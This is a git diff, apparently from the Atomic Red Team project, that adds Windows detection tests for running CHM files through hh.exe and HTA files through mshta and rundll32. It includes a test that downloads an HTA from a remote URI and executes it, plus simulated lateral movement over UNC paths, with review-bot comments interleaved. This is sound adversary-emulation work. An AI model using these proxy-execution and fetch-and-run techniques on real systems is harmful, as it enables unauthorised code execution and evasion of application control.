+ +## Atomic Test #5 - Invoke CHM Simulate Double click +Executes a CHM file simulating a user double click. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| chm_file_path | Default path of CHM | string | Test.chm| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #6 - Invoke CHM with Script Engine and Help Topic +Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| topic_extension | Default Help Topic | string | html| +| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| +| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its| +| script_engine | Default Script Engine | string | JScript| +| chm_file_path | Default path of CHM | string | Test.chm| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic +Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| topic_extension | Default Help Topic | string | html| +| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| +| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its| +| chm_file_path | Default path of CHM | string | Test.chm| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + +
diff --git a/atomics/T1218.001/T1218.001.yaml b/atomics/T1218.001/T1218.001.yaml
index 9ef61e03..e73024c3 100644
--- a/atomics/T1218.001/T1218.001.yaml
+++ b/atomics/T1218.001/T1218.001.yaml
@@ -43,3 +43,152 @@ atomic_tests:
 hh.exe #{remote_chm_file}
 name: command_prompt
+- name: Invoke CHM with default Shortcut Command Execution
+ auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7
+ description: Executes a CHM file with the default Shortcut Command method.
+ supported_platforms:
+ - windows
+ input_arguments:
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: $env:windir\hh.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
+
+- name: Invoke CHM with InfoTech Storage Protocol Handler
+ auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
+ description: Executes a CHM file with the ITS protocol handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: $env:windir\hh.exe
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
+
+- name: Invoke CHM Simulate Double click
+ auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a
+ description: Executes a CHM file simulating a user double click.
+ supported_platforms:
+ - windows
+ input_arguments:
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}'
+ name: powershell
+
+- name: Invoke CHM with Script Engine and Help Topic
+ auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5
+ description: Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension.
+ supported_platforms:
+ - windows
+ input_arguments:
+ topic_extension:
+ description: Default Help Topic
+ type: string
+ default: html
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: $env:windir\hh.exe
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ script_engine:
+ description: Default Script Engine
+ type: string
+ default: JScript
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
+
+- name: Invoke CHM Shortcut Command with ITS and Help Topic
+ auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247
+ description: Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension.
+ supported_platforms:
+ - windows
+ input_arguments:
+ topic_extension:
+ description: Default Help Topic
+ type: string
+ default: html
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: $env:windir\hh.exe
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
\ No newline at end of file
diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md
index 7b35e97e..077398a1 100644
--- a/atomics/T1218.005/T1218.005.md
+++ b/atomics/T1218.005/T1218.005.md
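Review bot: `get_prereq_command` in every new test installs AtomicTestHarnesses from the gallery with `-Force` and no version pin, and `prereq_command` only checks that some version of the module exists and exports Invoke-ATHCompiledHelp, so whatever the gallery serves next — including a release whose parameters no longer match these executor lines — satisfies the dependency; pinning with `Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -RequiredVersion <TESTED_VERSION>` and comparing `$RequiredModule.Version` in the check would make the prerequisite reproducible. The same unpinned install is repeated in each dependency block of the T1218.005.yaml hunk below. The executor commands also splice `#{hh_file_path}` and `#{chm_file_path}` into the PowerShell line unquoted, whereas the existing T1218.005 test visible in that hunk's context writes `"#{temp_file}"`; a value containing a space would be split into two arguments, so `-HHFilePath "#{hh_file_path}" -CHMFilePath "#{chm_file_path}"` would be more robust. Finally, `hh_file_path` is described as `path of modified HH.exe` while its default is the stock `$env:windir\hh.exe`, and it is typed `path` while the sibling `chm_file_path` is a `string`; `description: Path to hh.exe (defaults to the system copy)` and `type: path` on both would remove the ambiguity.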
@@ -18,6 +18,18 @@ Mshta.exe can be used to bypass application control solutions that do not accoun
 - [Atomic Test #3 - Mshta Executes Remote HTML Application (HTA)](#atomic-test-3---mshta-executes-remote-html-application-hta)
+- [Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement](#atomic-test-4---invoke-html-application---jscript-engine-over-local-unc-simulating-lateral-movement)
+
+- [Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click](#atomic-test-5---invoke-html-application---jscript-engine-simulating-double-click)
+
+- [Atomic Test #6 - Invoke HTML Application - Direct download from URI](#atomic-test-6---invoke-html-application---direct-download-from-uri)
+
+- [Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler](#atomic-test-7---invoke-html-application---jscript-engine-with-rundll32-and-inline-protocol-handler)
+
+- [Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler](#atomic-test-8---invoke-html-application---jscript-engine-with-inline-protocol-handler)
+
+- [Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path](#atomic-test-9---invoke-html-application---simulate-lateral-movement-over-unc-path)
+
@@ -109,4 +121,270 @@ remove-item "#{temp_file}" -ErrorAction Ignore
+
+
+
+## Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement
+Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| script_engine | Script Engine to use | string | JScript|
+| hta_file_path | HTA file name and or path to be used | string | Test.hta|
+| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click
+Executes an HTA Application using JScript script engine simulating double click.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| script_engine | Script Engine to use | string | JScript|
+| hta_file_path | HTA file name and or path to be used | string | Test.hta|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #6 - Invoke HTML Application - Direct download from URI
+Executes an HTA Application by directly downloading from remote URI.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
+| hta_uri | URI to HTA | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler
+Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| rundll32_file_path | Location of rundll32.exe | string | $env:windir\system32\rundll32.exe|
+| script_engine | Script Engine to use | string | JScript|
+| protocol_handler | Protocol Handler to use | string | About|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler
+Executes an HTA Application with JScript Engine and Inline Protocol Handler.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
+| script_engine | Script Engine to use | string | JScript|
+| protocol_handler | Protocol Handler to use | string | About|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path
+Executes an HTA Application with Simulate lateral movement over UNC Path.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
diff --git a/atomics/T1218.005/T1218.005.yaml b/atomics/T1218.005/T1218.005.yaml
index 6cc6af2c..84790d0a 100644
--- a/atomics/T1218.005/T1218.005.yaml
+++ b/atomics/T1218.005/T1218.005.yaml
@@ -50,4 +50,168 @@ atomic_tests:
 mshta "#{temp_file}"
 cleanup_command: |
 remove-item "#{temp_file}" -ErrorAction Ignore
+ name: powershell
+
+- name: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement
+ auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447
+ description: Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.
+ supported_platforms:
+ - windows
+ input_arguments:
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ hta_file_path:
+ description: HTA file name and or path to be used
+ type: string
+ default: Test.hta
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: $env:windir\system32\mshta.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}'
+ name: powershell
+
+- name: Invoke HTML Application - Jscript Engine Simulating Double Click
+ auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33
+ description: Executes an HTA Application using JScript script engine simulating double click.
+ supported_platforms:
+ - windows
+ input_arguments:
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ hta_file_path:
+ description: HTA file name and or path to be used
+ type: string
+ default: Test.hta
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick'
+ name: powershell
+
+- name: Invoke HTML Application - Direct download from URI
+ auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db
+ description: Executes an HTA Application by directly downloading from remote URI.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: $env:windir\system32\mshta.exe
+ hta_uri:
+ description: URI to HTA
+ type: string
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}'
+ name: powershell
+
+- name: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler
+ auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af
+ description: Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ rundll32_file_path:
+ description: Location of rundll32.exe
+ type: string
+ default: $env:windir\system32\rundll32.exe
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ protocol_handler:
+ description: Protocol Handler to use
+ type: string
+ default: About
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}'
+ name: powershell
+
+- name: Invoke HTML Application - JScript Engine with Inline Protocol Handler
+ auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
+ description: Executes an HTA Application with JScript Engine and Inline Protocol Handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: $env:windir\system32\mshta.exe
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ protocol_handler:
+ description: Protocol Handler to use
+ type: string
+ default: About
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}'
+ name: powershell
+
+- name: Invoke HTML Application - Simulate Lateral Movement over UNC Path
+ auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362
+ description: Executes an HTA Application with Simulate lateral movement over UNC Path.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: $env:windir\system32\mshta.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}'
 name: powershell
\ No newline at end of file
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 9123d06f..e4d70e0f 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -578,3 +578,18 @@ da75ae8d-26d6-4483-b0fe-700e4df4f037
 342cc723-127c-4d3a-8292-9c0c6b4ecadc
 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
 ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6
+14920ebd-1d61-491a-85e0-fe98efe37f25
+cbbff285-9051-444a-9d17-c07cd2d230eb
+e9f2b777-3123-430b-805d-5cedc66ab591
+2988133e-561c-4e42-a15f-6281e6a9b2db
+29d6f0d7-be63-4482-8827-ea77126c1ef7
+b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
+5decef42-92b8-4a93-9eb2-877ddcb9401a
+4f83adda-f5ec-406d-b318-9773c9ca92e5
+15756147-7470-4a83-87fb-bb5662526247
+007e5672-2088-4853-a562-7490ddc19447
+58a193ec-131b-404e-b1ca-b35cf0b18c33
+39ceed55-f653-48ac-bd19-aceceaf525db
+e7e3a525-7612-4d68-a5d3-c4649181b8af
+d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
+b8a8bdb2-7eae-490d-8251-d5e0295b2362
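Review bot: None of the six new tests in this hunk defines a `cleanup_command`, while the existing test in the hunk's context removes its artifact with `remove-item "#{temp_file}" -ErrorAction Ignore`; if the harness materialises `#{hta_file_path}` (default `Test.hta`) or the content fetched from `#{hta_uri}` on disk, those files are left behind after each run, which matters most for the 'Direct download from URI' test since it would leave downloaded executable content in the working directory of a lab host that reruns atomics. Once the harness's on-disk artifacts are confirmed, a per-test `cleanup_command: | remove-item "#{hta_file_path}" -ErrorAction Ignore` (or a sentence in `description` stating that cleanup is delegated to the harness) would bring these in line with the rest of the file. `mshta_file_path` and `rundll32_file_path` are typed `string` here whereas the parallel `hh_file_path` in T1218.001.yaml is `path`; `type: path` on both keeps the two files consistent. The last test's description reads awkwardly; `Executes an HTA Application, simulating lateral movement over a UNC path.` would be clearer.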